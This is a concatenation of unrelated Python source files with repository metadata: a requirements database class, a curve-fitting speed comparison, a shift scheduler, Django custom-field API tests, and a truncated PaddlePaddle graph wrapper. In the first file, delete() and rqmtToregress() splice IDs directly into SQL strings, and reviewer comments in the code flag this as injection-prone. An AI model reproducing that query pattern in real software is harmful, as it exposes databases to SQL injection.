            # NOTE(review): SQL ends in a bare WHERE — presumably GET_RECORDS
            # appends the filter/pagination clauses; confirm against its code.
            sql = 'SELECT * FROM t_requirements_info WHERE'
            rqmt_lists = GET_RECORDS(sql, page, records,group_id=group_id,token=token)
            return_data = respdata().sucessResp(rqmt_lists)
            return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
        except Exception as e:
            return_data = respdata().exceptionResp(e)
            return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
    def insert(self, data):
        '''
        Insert a new requirement record.
        :param data: JSON string holding the record's fields
        :return: JSON response string
        '''
        try:
            rqmt_id=newID().RQMT_ID()
            get_data=json.loads(data)
            rqmt_dever=get_data['rqmt_dever']
            rqmt_tester=get_data['rqmt_tester']
            rqmt_desc=get_data['rqmt_desc']
            group_id =getCode(get_data['group_id'])
            rqmt_end_date=get_data['rqmt_end_date']
            rqmt_begin_date = get_data['rqmt_begin_date']
            rqmt_status = get_data['rqmt_status']
            # Parameterized insert — the safe pattern the other raw-SQL
            # methods in this class should follow as well.
            sql='INSERT INTO t_requirements_info (rqmt_dever, rqmt_tester, rqmt_desc, rqmt_end_date, rqmt_id,group_id,rqmt_begin_date,rqmt_status) VALUE(%s,%s,%s,%s,%s,%s,%s,%s)'
            params=(rqmt_dever, rqmt_tester, rqmt_desc, rqmt_end_date, rqmt_id,group_id,rqmt_begin_date,rqmt_status)
            insert_result = DB_CONN().db_Insert(sql,params)
            # insert_result=insertToDatabase('t_requirements_info',get_data,rqmt_id=rqmt_id)
            return_data = respdata().sucessMessage('', '新增成功,新增记录数为: ' + str(insert_result))
            return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
        except Exception as e:
            return_data = respdata().failMessage('','新增失败,请检查!错误信息为:'+str(e))
            return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
    def update(self, data):
        '''
        Update an existing requirement record.
        :param data: JSON string; must contain rqmt_id plus the changed fields
        :return: JSON response string
        '''
        try:
            get_data=json.loads(data)
            rqmt_id = get_data['rqmt_id']
            update_result = updateToDatabase('t_requirements_info', get_data, rqmt_id=rqmt_id)
            return_data = respdata().sucessMessage('', '更新成功,更新条数:'+str(update_result))
            return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
        except Exception as e:
            return_data = respdata().failMessage('', '更新失败,请检查!错误信息为:' + str(e))
            return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
    def delete(self, rqmt_id):
        '''
        Delete a requirement together with its associated cases.
        :param rqmt_id: id of the requirement to remove
        :return: JSON response string
        '''
        # SECURITY(review): rqmt_id is concatenated straight into the SQL —
        # injectable if it originates from user input.  Should be rewritten
        # as a parameterized query like insert() uses (verify db_Update
        # supports bound parameters first).
        sql = 'DELETE A,B FROM t_requirements_info A LEFT JOIN rqmt_case_info B ON A.rqmt_id=B.rqmt_id WHERE A.rqmt_id="' + rqmt_id + '"'
        DB_CONN().db_Update(sql)
        return_data = respdata().sucessMessage('', '删除成功!')
        return json.dumps(return_data, cls=MyEncoder, ensure_ascii=False)
    def rqmtToregress (self,data):
        '''
        Synchronize a requirement's cases into the regression case table
        (regress_case_info), updating existing cases and inserting new ones.
        Fails if any case lacks a group_id.
        :param data: JSON string containing rqmt_id
        :return: JSON response string
        '''
        rqmt_id=json.loads(data)['rqmt_id']
        counts = int()
        try:
            # SECURITY(review): rqmt_id / case_id are interpolated into raw
            # SQL here as well — same injection concern as delete().
            rqmt_case_sql="SELECT * FROM rqmt_case_info WHERE rqmt_id= '"+rqmt_id+"'"
            rqmt_case=getJsonFromDatabase(rqmt_case_sql)
            if rqmt_case:
                rqmt_case=rqmt_case
            else:
                rqmt_case=[]
                return_data = respdata().failMessage('', '同步失败~~未获取到该需求下的用例,请检查是否有用例存在!~')
                return json.dumps(return_data, ensure_ascii=False)
            case_list =[]
            case_list_no_group_id =[]
            for i in rqmt_case:
                if i.get('group_id') == None or i.get('group_id') == '':
                    # Ungrouped cases block the sync; collect them for the
                    # error message below.
                    case_list_no_group_id.append(i.get('case_id'))
                else:
                    del i['adddate']
                    case_list.append(i)
            if case_list_no_group_id !=[]:
                return_data=respdata().failMessage('','同步失败,用例中存在未分组用例,清单如下:【'+str(case_list_no_group_id)+'】,请修改添加分组后提交')
                return json.dumps(return_data,ensure_ascii=False)
            else:
                for j in case_list:
                    case_id = j.get('case_id')
                    selectsql = "SELECT * FROM regress_case_info WHERE case_id='%s'" % ( case_id)
                    # Upsert: update when the case already exists, else insert.
                    count = DB_CONN().db_Update(selectsql)
                    if count > 0:
                        update_counts = updateToDatabase('regress_case_info', j,case_id=case_id)
                        counts=counts+update_counts
                    else:
                        insert_counts =insertToDatabase('regress_case_info', j)
                        counts = counts + insert_counts
                return_data=respdata().sucessMessage('','同步成功,!~~请确认!~')
                return json.dumps(return_data,ensure_ascii=False)
        except Exception as e:
            return_data = respdata().failMessage('', '同步失败~~异常信息为~'+str(e))
            return json.dumps(return_data, ensure_ascii=False)
| 43.808
| 179
| 0.570489
|
4a0e8b875254803e78ddfd75c2193811476d9d21
| 4,477
|
py
|
Python
|
agpy/mpfit/oldtests/mpfit_vs_scipy.py
|
keflavich/agpy
|
fb3a42d9909b7cd1ba74247530bcc8742f5aaeb1
|
[
"MIT"
] | 16
|
2015-05-08T11:14:26.000Z
|
2021-11-19T19:05:16.000Z
|
agpy/mpfit/oldtests/mpfit_vs_scipy.py
|
keflavich/agpy
|
fb3a42d9909b7cd1ba74247530bcc8742f5aaeb1
|
[
"MIT"
] | 3
|
2016-05-12T16:27:14.000Z
|
2020-12-27T01:14:24.000Z
|
agpy/mpfit/oldtests/mpfit_vs_scipy.py
|
keflavich/agpy
|
fb3a42d9909b7cd1ba74247530bcc8742f5aaeb1
|
[
"MIT"
] | 19
|
2015-03-30T22:34:14.000Z
|
2020-11-25T23:29:53.000Z
|
"""
Compare speed and fit quality for a few cases using mpfit and scipy.optimize.leastsq
"""
from agpy.mpfit import mpfit
from agpy.timer import print_timing
from scipy.optimize import leastsq
import scipy.optimize
import numpy as np
import timeit
def gaussian(x, A, dx, w, return_components=False):
    """
    Evaluate a 1-dimensional Gaussian A*exp(-(x-dx)**2/(2*w**2)) at x.

    [amplitude A, center dx, width w]
    return_components does nothing but is required by all fitters
    """
    xarr = np.array(x)  # make sure the input is a plain array, not a spectroscopic axis
    exponent = -(xarr - dx) ** 2 / (2.0 * w ** 2)
    return A * np.exp(exponent)
def error_function_generator(xdata, ydata, error=None, model=gaussian, mpfit=False, sumsquares=False, **kwargs):
    """
    Build the residual function consumed by the fitters in this module.

    The returned callable maps a parameter vector to either the weighted
    residual array (default), ``[0, residuals]`` (mpfit's convention), or the
    scalar sum of squared residuals (for fmin/anneal).
    """
    weights = np.ones(ydata.shape) if error is None else error
    def error_function(params, **kwargs):
        residuals = (ydata - model(xdata, *params)) / weights
        if sumsquares:
            return (residuals ** 2).sum()
        if mpfit:
            return [0, residuals]
        return residuals
    return error_function
def mpfitter(xdata, ydata, params=None, error=None, model=gaussian, quiet=True, **kwargs):
    """
    Find the least-squares fit using mpfit
    Returns (best-fit parameters, parameter errors).
    """
    errfunc = error_function_generator(xdata,ydata,error=error,model=model,mpfit=True)
    mp = mpfit(errfunc, params, quiet=quiet, **kwargs)
    return mp.params,mp.perror
def lsfitter(xdata, ydata, params=None, error=None, model=gaussian):
    """
    Find the least-squares fit using scipy.optimize.leastsq

    Returns (best-fit parameters, parameter errors); the errors are None
    when the covariance could not be estimated.
    """
    errfunc = error_function_generator(xdata,ydata,error=error,model=model)
    p, cov, infodict, errmsg, success = leastsq(errfunc, params, full_output=1)
    # Bug fix: leastsq returns cov=None for a singular/degenerate Jacobian;
    # the original then crashed with AttributeError on cov.diagonal().
    perror = cov.diagonal()**0.5 if cov is not None else None
    return p, perror
def annealfitter(xdata, ydata, params=None, error=None, model=gaussian):
    """
    Find the fit using scipy.optimize.anneal
    Returns anneal's full output tuple.
    """
    errfunc = error_function_generator(xdata,ydata,error=error,model=model, sumsquares=True)
    p = scipy.optimize.anneal(errfunc, params, full_output=1)
    return p
def fminfitter(xdata, ydata, params=None, error=None, model=gaussian, disp=False):
    """
    Find the fit using scipy.optimize.fmin
    Returns fmin's full output tuple.
    """
    errfunc = error_function_generator(xdata,ydata,error=error,model=model, sumsquares=True)
    p = scipy.optimize.fmin(errfunc, params, full_output=1, disp=disp)
    return p
if __name__ == "__main__":
    #do some timing
    # NOTE(review): this driver uses Python 2 ``print`` statements and will
    # not run under Python 3.
    length = 1000
    xarr = np.linspace(-5,5,length)
    yarr = gaussian(xarr, 0.75, -0.25, 2.2)
    noise = np.random.randn(length) * 0.25
    err = np.ones(length)*0.25
    # Sanity-check each fitter once before timing.
    print mpfitter(xarr,yarr+noise,[1,0,1],err)
    print lsfitter(xarr,yarr+noise,[1,0,1],err)
    print annealfitter(xarr,yarr+noise,[1,0,1],err)
    print fminfitter(xarr,yarr+noise,[1,0,1],err)
    function_names = ['mpfitter','lsfitter','fminfitter']#,'annealfitter']
    A,dx,s,n = 0.75,-0.25,2.2,0.25
    nfits = 25
    ntries = 7
    print ("%18s" % "nelements")+"".join(["%18s" % fn for fn in function_names])
    mins = {}
    nels = (2e1,5e1,1e2,2e2,3e2,4e2,5e2,7.5e2,1e3,2.5e3,5e3,1e4,5e4,1e5)
    for nelements in nels:
        # Time each fitter with timeit; keep the fastest of ``ntries`` runs
        # of ``nfits`` fits each.
        min_i = ["%18f" % (min(timeit.Timer("%s(xarr,yarr+noise,[1,0,1],err)" % (fn),
            setup="from mpfit_vs_scipy import %s,gaussian; import numpy as np; xarr=np.linspace(-5,5,%i);\
yarr=gaussian(xarr,%f,%f,%f); noise=np.random.randn(%i);\
err = np.ones(%i)*%f" % (fn, nelements, A, dx, s, nelements, nelements, n)).repeat(ntries,nfits)))
            for fn in function_names]
        print "%17i:" % (int(nelements)) + "".join(min_i)
        mins[nelements]=min_i
    from pylab import *
    mpmins = array([mins[n][0] for n in nels],dtype='float')
    lsmins = array([mins[n][1] for n in nels],dtype='float')
    fmmins = array([mins[n][2] for n in nels],dtype='float')
    # Absolute timing curves, log-log.
    loglog(nels,mpmins,label='mpfit')
    loglog(nels,lsmins,label='leastsq')
    loglog(nels,fmmins,label='fmin')
    xlabel("Number of Elements")
    ylabel("Evaluation Time for %i fits (seconds)" % nfits)
    legend(loc='best')
    savefig("comparison_plot.png")
    clf()
    # Timing ratios relative to leastsq.
    semilogx(nels,mpmins/lsmins,label='mpfit/leastsq')
    semilogx(nels,fmmins/lsmins,label='fmin/leastsq')
    xlabel("Number of Elements")
    ylabel("Ratio to leastsq (which is generally the fastest)")
    legend(loc='best')
    savefig("time_ratio_plot.png")
| 31.528169
| 118
| 0.649542
|
4a0e8e3bebbf9b23526aabc95ae7bbcd0dbde3a0
| 6,359
|
py
|
Python
|
calculations.py
|
BenTimor/Sidur
|
2deb619b683043447d25abb6e0421a7cc5869b88
|
[
"MIT"
] | 1
|
2020-12-07T05:43:17.000Z
|
2020-12-07T05:43:17.000Z
|
calculations.py
|
BenTimor/Sidur
|
2deb619b683043447d25abb6e0421a7cc5869b88
|
[
"MIT"
] | null | null | null |
calculations.py
|
BenTimor/Sidur
|
2deb619b683043447d25abb6e0421a7cc5869b88
|
[
"MIT"
] | null | null | null |
from typing import List
from .schedule import *
from random import shuffle
from . import config
def embedding(schedule: Schedule, employees: List[Employee]):
    """
    Embedding all of the employees into the schedule.

    Iterates priorities from 5 (must work) down to 2 (lowest usable
    priority); at each priority, fills every shift of every day with the
    least-working available employees until the shift is staffed.

    :param schedule: The schedule
    :param employees: The employees
    """
    # Embedding the priorities from 5 to 2
    for priority in range(5, 1, -1):
        for day_number in range(len(schedule)):
            day = schedule[day_number]
            for shift in day:
                # In the first run of every shift, set all the empty shifts of the employees to 3
                if priority == 5:
                    set_shift_employees(shift, employees)
                # Get & Shuffle employees with this priority
                available_employees = priority_employees(shift, employees, priority)
                shuffle(available_employees)
                # If the priority is 5 we must embed the employees
                if priority == 5:
                    for employee in available_employees:
                        embed_employee(shift, schedule, employee)
                    continue
                # Check how many employees needed, if there are not needed, continue
                employees_needed = shift.employees_needed - len(shift.employees)
                # Repeatedly pick the least-working candidates until the shift
                # is full or the candidate pool drains.
                while available_employees:
                    # If needed, add the employees
                    least_working = least_working_employees(available_employees)
                    # If we don't need any more employees, break
                    if employees_needed <= 0:
                        break
                    # If we have more than enough employees, add just the right amount
                    if len(least_working) >= employees_needed:
                        for employee in least_working[:employees_needed]:
                            embed_employee(shift, schedule, employee)
                            available_employees.remove(employee)
                            employees_needed -= 1
                    # If we don't have enough employees (in this run!), add all of them
                    else:
                        for employee in least_working:
                            embed_employee(shift, schedule, employee)
                            available_employees.remove(employee)
                            employees_needed -= 1
                # while/else: runs only when the pool drained WITHOUT a break,
                # i.e. we ran out of candidates while still short-staffed.
                else:
                    # Check if we have enough employees
                    if priority == 2 and employees_needed > 0:
                        print(f"Not enough employees for day {day_number} / shift {shift.start}-{shift.end}")
def embed_employee(shift: Shift, schedule: Schedule, employee: Employee, past_check=False):
    """
    Adding an employee into a shift.

    After booking the shift, the employee's nearby shifts are blocked: shifts
    starting within config.time_between_shifts hours after this shift (forward
    scan), and — via a recursive backward pass — shifts within that window
    before it.

    :param shift: The shift
    :param schedule: All of the schedule
    :param employee: The employee
    :param past_check: If it's true, the function won't add the employee to any
        shift, it'll just scan the schedule backwards and set the past shifts
        in the config.time_between_shifts range to -1.
    """
    if not past_check:
        shift.append(employee)
        # Setting the shift to -2 so he won't be embedded again
        employee[shift] = -2
        # BUGFIX: the original reassigned `past_check` itself to 1/-1 (both
        # truthy) before testing `if not past_check:` at the end, which made
        # the backward pass unreachable; trigger it here instead, before the
        # forward scan's early returns can skip it.
        embed_employee(shift, schedule, employee, True)
    # Scan direction: backwards (-1) blocks past shifts, forwards (1) blocks
    # upcoming shifts, so he won't work within config hours around this shift.
    direction = -1 if past_check else 1
    allowed = False
    add = 0  # hours elapsed (24 per day) since the booked shift's day
    for day in schedule[::direction]:
        if allowed:
            add += 24
        same_day = False
        for day_shift in day[::direction]:
            # Since the moment we pass on his shift, we'll check the rest of the shifts
            if day_shift == shift:
                allowed = True
                same_day = True
                continue
            # If needed, disabling all shifts in the same day
            if same_day and config.one_shift_per_day:
                employee[day_shift] = -1
                continue
            if allowed:
                # If the shift starts in less than X hours (from the config) he won't be able to be embedded into it
                if shift.end < shift.start:
                    # The shift ends after midnight (e.g. 18-02): its end
                    # belongs to the next day, so add 24 hours to it.
                    if day_shift.start + add > shift.end + 24 + config.time_between_shifts:
                        return
                    else:
                        employee[day_shift] = -1
                else:
                    if day_shift.start + add > shift.end + config.time_between_shifts:
                        return
                    else:
                        employee[day_shift] = -1
# You can't have shift with not priority. So we'll set every shift to 3.
def set_shift_employees(shift, employees: List[Employee]):
    """
    Give the shift a default priority of 3 for every employee who has not
    stated any priority for it.

    :param shift: The shift
    :param employees: List of employees to set it on
    """
    for person in employees:
        person.setdefault(shift, 3) if hasattr(person, 'setdefault') else None
        if shift not in person:
            person[shift] = 3
def priority_employees(shift: Shift, employees: List[Employee], priority: int) -> List[Employee]:
    """
    :param shift: What shift you want the employees to work at
    :param employees: List of all of the employees you want to check
    :param priority: What is the priority
    :return: List of all of the employees which has this priority for the shift
    """
    matching = []
    for person in employees:
        if person[shift] == priority:
            matching.append(person)
    return matching
def least_working_employees(employees: List[Employee]) -> List[Employee]:
    """
    :param employees: List of the employees to check
    :return: The employees which work the least (ties included, input order kept)
    """
    if not employees:
        return []
    # Count each employee's shifts once, then keep everyone at the minimum.
    counts = [shifts_amount(person) for person in employees]
    fewest = min(counts)
    return [person for person, count in zip(employees, counts) if count == fewest]
def shifts_amount(employee: Employee) -> int:
    """
    :param employee: The employee to check
    :return: The amount of shifts that the employee has (entries marked -2)
    """
    total = 0
    for value in employee.values():
        if value == -2:
            total += 1
    return total
| 39.993711
| 165
| 0.590344
|
4a0e8eda57315939710ecdb13175ce70149df7b0
| 7,365
|
py
|
Python
|
tests/ozpcenter_api/test_api_custom_field.py
|
emosher/ozp-backend
|
d31d00bb8a28a8d0c999813f616b398f41516244
|
[
"Apache-2.0"
] | 1
|
2018-10-05T17:03:01.000Z
|
2018-10-05T17:03:01.000Z
|
tests/ozpcenter_api/test_api_custom_field.py
|
emosher/ozp-backend
|
d31d00bb8a28a8d0c999813f616b398f41516244
|
[
"Apache-2.0"
] | 1
|
2017-01-06T19:20:32.000Z
|
2017-01-06T19:20:32.000Z
|
tests/ozpcenter_api/test_api_custom_field.py
|
emosher/ozp-backend
|
d31d00bb8a28a8d0c999813f616b398f41516244
|
[
"Apache-2.0"
] | 7
|
2016-12-16T15:42:05.000Z
|
2020-09-05T01:11:27.000Z
|
import pytest
from django.test import override_settings
from rest_framework import status
from ozpcenter.models import CustomField
from tests.cases import APITestCase, ModelAssertionsMixin
from tests.ozpcenter_api import fixtures
from ozpcenter.api.custom_field.model_access import get_custom_field_by_id
@pytest.mark.integration
@pytest.mark.fast
@override_settings(ES_ENABLED=False)
class CustomFieldApiTest(ModelAssertionsMixin,
                         APITestCase):
    """
    API tests for /api/custom_field/: list/get are open to all authenticated
    roles; create/update/delete require the AML steward role.
    """

    @classmethod
    def setUpTestData(cls):
        cls.aml_steward_profile = fixtures.create_steward()
        cls.org_steward_profile = fixtures.create_org_steward()
        cls.user_profile = fixtures.create_user_profile()

        cls.type1 = fixtures.create_custom_field_type("Type 1", "Type 1", "text/html")
        cls.type2 = fixtures.create_custom_field_type("JSON Type", "JSON", "application/json")

        cls.field1 = fixtures.create_custom_field(cls.type1, 'Custom Field 1', 'Custom Field Label 1')
        # NOTE(review): field2 and field3 intentionally share the same
        # name/label here; confirm this duplication is deliberate.
        cls.field2 = fixtures.create_custom_field(cls.type1, 'Custom Field 2', 'Custom Field Label 2')
        cls.field3 = fixtures.create_custom_field(cls.type1, 'Custom Field 2', 'Custom Field Label 2')

        cls.fields_ordered = [cls.field1, cls.field2, cls.field3]

    def setUp(self):
        pass

    # --- thin HTTP helpers -------------------------------------------------

    def _list_custom_fields(self):
        return self.client.get("/api/custom_field/", format="json")

    def _get_custom_field(self, field_id):
        return self.client.get("/api/custom_field/%s/" % field_id, format="json")

    def _create_custom_field(self, data=None):
        return self.client.post("/api/custom_field/", data, format="json")

    def _update_custom_field(self, field_id, data=None):
        return self.client.put("/api/custom_field/%s/" % field_id, data, format="json")

    def _patch_custom_field(self, field_id, data=None):
        return self.client.patch("/api/custom_field/%s/" % field_id, data, format="json")

    def _delete_custom_field(self, field_id):
        return self.client.delete("/api/custom_field/%s/" % field_id, format="json")

    # --- list / retrieve (all roles allowed) -------------------------------

    def test_list_custom_fields_user(self):
        self.authenticate_as(self.user_profile)

        response = self._list_custom_fields()

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldsEqual(response.data, self.fields_ordered)

    def test_list_custom_fields_org_steward(self):
        self.authenticate_as(self.org_steward_profile)

        response = self._list_custom_fields()

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldsEqual(response.data, self.fields_ordered)

    def test_list_custom_fields_aml_steward(self):
        self.authenticate_as(self.aml_steward_profile)

        response = self._list_custom_fields()

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldsEqual(response.data, self.fields_ordered)

    def test_get_custom_field_by_id_user(self):
        self.authenticate_as(self.user_profile)

        response = self._get_custom_field(self.field1.id)

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldEqual(response.data, self.field1)

    def test_get_custom_field_by_id_org_steward(self):
        self.authenticate_as(self.org_steward_profile)

        response = self._get_custom_field(self.field1.id)

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldEqual(response.data, self.field1)

    def test_get_custom_field_by_id_aml_steward(self):
        self.authenticate_as(self.aml_steward_profile)

        response = self._get_custom_field(self.field1.id)

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldEqual(response.data, self.field1)

    # --- create / update / delete (AML steward only) -----------------------

    def test_create_custom_field_as_aml_steward(self):
        self.authenticate_as(self.aml_steward_profile)

        request = self._custom_field_create_request()
        response = self._create_custom_field(request)

        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertCustomFieldEqual(response.data, request)

    def test_create_custom_field_as_org_steward_unauthorized(self):
        self.authenticate_as(self.org_steward_profile)

        # BUGFIX: was passing an id where the request body belongs; send a
        # real payload so the 403 is clearly an authorization failure.
        response = self._create_custom_field(self._custom_field_create_request())

        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_create_custom_field_as_user_unauthorized(self):
        self.authenticate_as(self.user_profile)

        response = self._create_custom_field(self._custom_field_create_request())

        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_update_custom_field_as_aml_steward(self):
        self.authenticate_as(self.aml_steward_profile)

        response = self._update_custom_field(self.field1.id, self._custom_field_update_request())

        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertCustomFieldEqual(response.data, self._custom_field_update_request())

    def test_update_custom_field_as_org_steward_unauthorized(self):
        self.authenticate_as(self.org_steward_profile)

        response = self._update_custom_field(self.field1.id, self._custom_field_update_request())

        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_update_custom_field_as_user_unauthorized(self):
        self.authenticate_as(self.user_profile)

        response = self._update_custom_field(self.field1.id, self._custom_field_update_request())

        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_delete_custom_field_as_steward(self):
        self.authenticate_as(self.aml_steward_profile)

        response = self._delete_custom_field(self.field1.id)

        self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)

        # BUGFIX: was hard-coded id 1, which only worked when field1 happened
        # to get the first primary key; look up the actual deleted id.
        with self.assertRaises(CustomField.DoesNotExist):
            get_custom_field_by_id(self.field1.id, True)

    def test_delete_custom_field_as_org_steward_unauthorized(self):
        self.authenticate_as(self.org_steward_profile)

        response = self._delete_custom_field(self.field1.id)

        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_delete_custom_field_as_user_unauthorized(self):
        self.authenticate_as(self.user_profile)

        response = self._delete_custom_field(self.field1.id)

        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    # --- request payload builders ------------------------------------------

    def _custom_field_create_request(self):
        return {
            'display_name': 'Field 4',
            'label': 'Custom Text Field',
            'type': self.type1.id,
            'section': 'Section',
            'description': 'Description',
            'tooltip': 'Tooltip',
            'properties': 'Properties',
            'is_required': False,
            'admin_only': True,
            'all_listing_types': False
        }

    def _custom_field_update_request(self):
        return {
            'id': self.field1.id,
            'type': self.type2.id,
            'display_name': 'New Field 1',
            'label': 'New Field Label 1',
            'section': 'Section',
            'description': 'Description',
            'tooltip': 'Tooltip',
            'properties': 'Properties',
            'is_required': False,
            'admin_only': True,
            'all_listing_types': False
        }
| 37.385787
| 102
| 0.712559
|
4a0e8ef005ac34abcab87222f7c3cefc22b75de1
| 19,794
|
py
|
Python
|
python/paddle/fluid/contrib/slim/graph/graph_wrapper.py
|
Sand3r-/Paddle
|
1217a521554d63caa1381b8716910d0268dfc22d
|
[
"Apache-2.0"
] | 2
|
2017-05-15T06:52:18.000Z
|
2017-06-13T11:55:11.000Z
|
python/paddle/fluid/contrib/slim/graph/graph_wrapper.py
|
MaJun-cn/Paddle
|
0ec3a42e9740a5f5066053bb49a923d538eba24a
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/contrib/slim/graph/graph_wrapper.py
|
MaJun-cn/Paddle
|
0ec3a42e9740a5f5066053bb49a923d538eba24a
|
[
"Apache-2.0"
] | 4
|
2020-07-27T13:24:03.000Z
|
2020-08-06T08:20:32.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
from .... import io
from .... import compiler
from ....framework import Program
from ....framework import program_guard
from ....framework import Parameter
from ....framework import Variable
from ....executor import Executor
import copy
from collections import Iterable
from ....io import save_inference_model, load_inference_model, save_persistables
import numpy as np
import pickle
import os
__all__ = ['GraphWrapper', 'VarWrapper', 'OpWrapper']
OPTIMIZER_OPS = [
'momentum',
'lars_momentum',
'adagrad',
'adam',
'adamax',
'dpsgd',
'decayed_adagrad',
'adadelta',
'rmsprop',
]
class VarWrapper(object):
    """Wrap a ``framework.Variable`` for traversal inside a GraphWrapper."""

    def __init__(self, var, graph):
        assert isinstance(var, Variable)
        assert isinstance(graph, GraphWrapper)
        self._var = var
        self._graph = graph

    def __eq__(self, v):
        """
        Overwrite this function for ...in... syntax in python.
        Two wrappers are equal when they wrap variables with the same name.
        """
        return self._var.name == v._var.name

    def name(self):
        """Get the name of the variable."""
        return self._var.name

    def shape(self):
        """Get the shape of the variable."""
        return self._var.shape

    def set_shape(self, shape):
        """Set the shape of the variable."""
        self._var.desc.set_shape(shape)

    def inputs(self):
        """
        Get all the operators that use this variable as output.
        Returns:
            list<OpWrapper>: A list of operators.
        """
        return [op for op in self._graph.ops() if self in op.all_inputs()]

    def outputs(self):
        """
        Get all the operators that use this variable as input.
        Returns:
            list<OpWrapper>: A list of operators.
        """
        return [op for op in self._graph.ops() if self in op.all_outputs()]
class OpWrapper(object):
    """Wrap a ``framework.Operator`` for traversal inside a GraphWrapper."""

    def __init__(self, op, graph):
        assert isinstance(graph, GraphWrapper)
        self._op = op
        self._graph = graph

    def __eq__(self, op):
        """
        Overwrite this function for ...in... syntax in python.
        Two wrappers are equal when they wrap the operator at the same index.
        """
        return self.idx() == op.idx()

    def all_inputs(self):
        """Get all the input variables of this operator."""
        lookup = self._graph.var
        return [lookup(name) for name in self._op.input_arg_names]

    def all_outputs(self):
        """Get all the output variables of this operator."""
        lookup = self._graph.var
        return [lookup(name) for name in self._op.output_arg_names]

    def idx(self):
        """Get the id of this operator."""
        return self._op.idx

    def type(self):
        """Get the type of this operator."""
        return self._op.type

    def is_bwd_op(self):
        """Whether this operator is backward op."""
        return self.type().endswith('_grad')

    def is_opt_op(self):
        """Whether this operator is optimizer op."""
        return self.type() in OPTIMIZER_OPS

    def inputs(self, name):
        """Get all the variables bound to the input slot *name*."""
        lookup = self._graph.var
        return [lookup(var_name) for var_name in self._op.input(name)]

    def outputs(self, name):
        """Get all the variables bound to the output slot *name*."""
        lookup = self._graph.var
        return [lookup(var_name) for var_name in self._op.output(name)]

    def set_attr(self, key, value):
        """
        Set the value of attribute by attribute's name.

        Args:
            key(str): the attribute name.
            value(bool|int|str|float|list): the value of the attribute.
        """
        self._op._set_attr(key, value)

    def attr(self, name):
        """
        Get the attribute by name.

        Args:
            name(str): the attribute name.

        Returns:
            bool|int|str|float|list: The attribute value. The return value
            can be any valid attribute type.
        """
        return self._op.attr(name)
class GraphWrapper(object):
    """
    It is a wrapper of paddle.fluid.framework.IrGraph with some special functions
    for paddle slim framework.
    """

    def __init__(self, program=None, in_nodes=[], out_nodes=[]):
        """
        Args:
            program(framework.Program): The program to wrap; an empty Program
                is created when None.
            in_nodes(dict): A dict to indicate the input nodes of the graph.
                The key is user-defined and human-readable name.
                The value is the name of Variable.
            out_nodes(dict): A dict to indicate the output nodes of the graph.
                The key is user-defined and human-readable name.
                The value is the name of Variable.
        """
        # NOTE(review): mutable default args ([]) are only read here (copied
        # into OrderedDicts), so they are harmless, but None would be safer.
        super(GraphWrapper, self).__init__()
        self.program = Program() if program is None else program
        self.persistables = {}
        self.teacher_persistables = {}
        # Snapshot the persistable variables (parameters, optimizer state...).
        for var in self.program.list_vars():
            if var.persistable:
                self.persistables[var.name] = var
        self.compiled_graph = None
        in_nodes = [] if in_nodes is None else in_nodes
        out_nodes = [] if out_nodes is None else out_nodes
        self.in_nodes = OrderedDict(in_nodes)
        self.out_nodes = OrderedDict(out_nodes)
        self._attrs = OrderedDict()

    def all_parameters(self):
        """
        Get all the parameters in this graph.
        Returns:
            list<VarWrapper>: A list of VarWrapper instances.
        """
        params = []
        for block in self.program.blocks:
            for param in block.all_parameters():
                params.append(VarWrapper(param, self))
        return params

    def is_parameter(self, var):
        """
        Whether the given variable is parameter.
        Args:
            var(VarWrapper): The given variable.
        """
        return isinstance(var._var, Parameter)

    def is_persistable(self, var):
        """
        Whether the given variable is persistable.
        Args:
            var(VarWrapper): The given variable.
        """
        return var._var.persistable

    def compile(self, for_parallel=True, for_test=False, mem_opt=False):
        """
        Compile the program in this wrapper to framework.CompiledProgram for next running.
        This function must be called if the program is modified.
        Args:
            for_parallel(bool): Whether the program to run in data parallel way. default: True.
            for_test(bool): Whether the compiled program is used for test.
            mem_opt(bool): Whether to enable in-place/memory optimization
                passes (only meaningful with for_parallel).
        """
        target = self.program
        if for_test:
            loss = None
        else:
            # KeyError here means out_nodes was built without a 'loss' entry.
            loss = self.out_nodes['loss']
        if for_parallel:
            # disable memory optimize for stable training
            build_strategy = compiler.BuildStrategy()
            build_strategy.enable_inplace = mem_opt
            build_strategy.memory_optimize = mem_opt
            build_strategy.fuse_all_reduce_ops = False
            # build_strategy.async_mode = False
            self.compiled_graph = compiler.CompiledProgram(
                target).with_data_parallel(
                    loss_name=loss, build_strategy=build_strategy)
        else:
            self.compiled_graph = compiler.CompiledProgram(target)

    def ops(self):
        """
        Return all operator nodes included in the graph as a set.
        """
        ops = []
        for block in self.program.blocks:
            for op in block.ops:
